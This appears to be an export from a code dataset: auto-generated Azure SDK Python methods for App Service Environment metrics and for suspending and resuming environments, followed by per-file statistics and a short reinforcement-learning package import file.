    response = self._client.send(request, headers, **operation_config)

    if response.status_code not in (200,):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('SkuInfoCollection', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_worker_pool_instance_metrics(
        self, resource_group_name, name, worker_pool_name, instance, details=None, filter=None, custom_headers=None, raw=False, **operation_config):
    """Get metrics for a specific instance of a worker pool of a
    hostingEnvironment (App Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param worker_pool_name: Name of worker pool
    :type worker_pool_name: str
    :param instance: Name of instance in the worker pool
    :type instance: str
    :param details: Include instance details
    :type details: bool
    :param filter: Return only usages/metrics specified in the filter.
     Filter conforms to odata syntax. Example: $filter=(name.value eq
     'Metric1' or name.value eq 'Metric2') and startTime eq
     '2014-01-01T00:00:00Z' and endTime eq '2014-12-31T23:59:59Z' and
     timeGrain eq duration'[Hour|Minute|Day]'.
    :type filter: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: object
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Resolve the URL template with serialized path segments.
    template = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/instances/{instance}/metrics'
    url = self._client.format_url(
        template,
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'),
        name=self._serialize.url("name", name, 'str'),
        workerPoolName=self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
        instance=self._serialize.url("instance", instance, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'))

    # Optional query flags first, then the mandatory api-version.
    query = {}
    if details is not None:
        query['details'] = self._serialize.query("details", details, 'bool')
    if filter is not None:
        query['$filter'] = self._serialize.query("filter", filter, 'str')
    query['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Assemble headers: JSON content type, optional correlation id,
    # caller-supplied extras, and the configured accept-language.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET; anything but 200 becomes a CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)

    if response.status_code not in (200,):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('object', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_worker_pool_instance_metric_definitions(
        self, resource_group_name, name, worker_pool_name, instance, custom_headers=None, raw=False, **operation_config):
    """Get metric definitions for a specific instance of a worker pool of a
    hostingEnvironment (App Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param worker_pool_name: Name of worker pool
    :type worker_pool_name: str
    :param instance: Name of instance in the worker pool
    :type instance: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: object
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Resolve the URL template with serialized path segments.
    template = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/instances/{instance}/metricdefinitions'
    url = self._client.format_url(
        template,
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'),
        name=self._serialize.url("name", name, 'str'),
        workerPoolName=self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
        instance=self._serialize.url("instance", instance, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'))

    # Only the api-version travels on the query string.
    query = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble headers: JSON content type, optional correlation id,
    # caller-supplied extras, and the configured accept-language.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET; anything but 200 becomes a CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)

    if response.status_code not in (200,):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('object', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_multi_role_pool_instance_metrics(
        self, resource_group_name, name, instance, details=None, custom_headers=None, raw=False, **operation_config):
    """Get metrics for a specific instance of a multiRole pool of a
    hostingEnvironment (App Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param instance: Name of instance in the multiRole pool
    :type instance: str
    :param details: Include instance details
    :type details: bool
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: object
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Resolve the URL template with serialized path segments.
    template = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/instances/{instance}/metrics'
    url = self._client.format_url(
        template,
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'),
        name=self._serialize.url("name", name, 'str'),
        instance=self._serialize.url("instance", instance, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'))

    # Optional details flag first, then the mandatory api-version.
    query = {}
    if details is not None:
        query['details'] = self._serialize.query("details", details, 'bool')
    query['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Assemble headers: JSON content type, optional correlation id,
    # caller-supplied extras, and the configured accept-language.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET; anything but 200 becomes a CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)

    if response.status_code not in (200,):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('object', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_multi_role_pool_instance_metric_definitions(
        self, resource_group_name, name, instance, custom_headers=None, raw=False, **operation_config):
    """Get metric definitions for a specific instance of a multiRole pool of
    a hostingEnvironment (App Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param instance: Name of instance in the multiRole pool
    :type instance: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: object
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Resolve the URL template with serialized path segments.
    template = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/instances/{instance}/metricdefinitions'
    url = self._client.format_url(
        template,
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'),
        name=self._serialize.url("name", name, 'str'),
        instance=self._serialize.url("instance", instance, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'))

    # Only the api-version travels on the query string.
    query = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble headers: JSON content type, optional correlation id,
    # caller-supplied extras, and the configured accept-language.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET; anything but 200 becomes a CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)

    if response.status_code not in (200,):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('object', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def suspend_hosting_environment(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """
    Suspends the hostingEnvironment.

    Starts a long-running POST and returns a poller (or, when
    ``raw=True``, the raw first response).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype:
     :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
     instance that returns :class:`SiteCollection
     <azure.mgmt.web.models.SiteCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/suspend'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Per-request correlation id for service-side tracing.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request
    def long_running_send():
        # Initial POST that kicks off the long-running operation.
        request = self._client.post(url, query_parameters)
        return self._client.send(request, header_parameters, **operation_config)

    def get_long_running_status(status_link, headers=None):
        # Poll the service-provided status link until completion.
        request = self._client.get(status_link)
        if headers:
            request.headers.update(headers)
        return self._client.send(
            request, header_parameters, **operation_config)

    def get_long_running_output(response):
        # 200 and 202 are the terminal statuses; both carry a
        # SiteCollection payload. Anything else raises CloudError.
        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('SiteCollection', response)
        if response.status_code == 202:
            deserialized = self._deserialize('SiteCollection', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    if raw:
        # Raw mode skips polling: send once and wrap that first response.
        response = long_running_send()
        return get_long_running_output(response)

    long_running_operation_timeout = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    return AzureOperationPoller(
        long_running_send, get_long_running_output,
        get_long_running_status, long_running_operation_timeout)
def resume_hosting_environment(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """
    Resumes the hostingEnvironment.

    Starts a long-running POST and returns a poller (or, when
    ``raw=True``, the raw first response).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype:
     :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
     instance that returns :class:`SiteCollection
     <azure.mgmt.web.models.SiteCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/resume'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Per-request correlation id for service-side tracing.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request
    def long_running_send():
        # Initial POST that kicks off the long-running operation.
        request = self._client.post(url, query_parameters)
        return self._client.send(request, header_parameters, **operation_config)

    def get_long_running_status(status_link, headers=None):
        # Poll the service-provided status link until completion.
        request = self._client.get(status_link)
        if headers:
            request.headers.update(headers)
        return self._client.send(
            request, header_parameters, **operation_config)

    def get_long_running_output(response):
        # 200 and 202 are the terminal statuses; both carry a
        # SiteCollection payload. Anything else raises CloudError.
        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('SiteCollection', response)
        if response.status_code == 202:
            deserialized = self._deserialize('SiteCollection', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    if raw:
        # Raw mode skips polling: send once and wrap that first response.
        response = long_running_send()
        return get_long_running_output(response)

    long_running_operation_timeout = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    return AzureOperationPoller(
        long_running_send, get_long_running_output,
        get_long_running_status, long_running_operation_timeout)
| 46.469743
| 201
| 0.669689
| 13,183
| 122,866
| 6.035728
| 0.023667
| 0.03808
| 0.039525
| 0.03348
| 0.960864
| 0.957119
| 0.954052
| 0.951979
| 0.949968
| 0.947316
| 0
| 0.005786
| 0.234792
| 122,866
| 2,643
| 202
| 46.487325
| 0.840531
| 0.255856
| 0
| 0.885294
| 0
| 0.014706
| 0.189393
| 0.108515
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041176
| false
| 0
| 0.003676
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d16fae30f964d6f9a7fe772cb208af2692ee18b
| 102
|
py
|
Python
|
sb3_contrib/qrdqn/__init__.py
|
satoshinakamotodotmyselfpointcom/stable-baselines3-contrib
|
81ef23d2702aeb73d36f000d882da313d21aadef
|
[
"MIT"
] | null | null | null |
sb3_contrib/qrdqn/__init__.py
|
satoshinakamotodotmyselfpointcom/stable-baselines3-contrib
|
81ef23d2702aeb73d36f000d882da313d21aadef
|
[
"MIT"
] | null | null | null |
sb3_contrib/qrdqn/__init__.py
|
satoshinakamotodotmyselfpointcom/stable-baselines3-contrib
|
81ef23d2702aeb73d36f000d882da313d21aadef
|
[
"MIT"
] | null | null | null |
from sb3_contrib.qrdqn.policies import CnnPolicy, MlpPolicy
from sb3_contrib.qrdqn.qrdqn import QRDQN
| 34
| 59
| 0.862745
| 15
| 102
| 5.733333
| 0.533333
| 0.162791
| 0.325581
| 0.44186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021505
| 0.088235
| 102
| 2
| 60
| 51
| 0.903226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.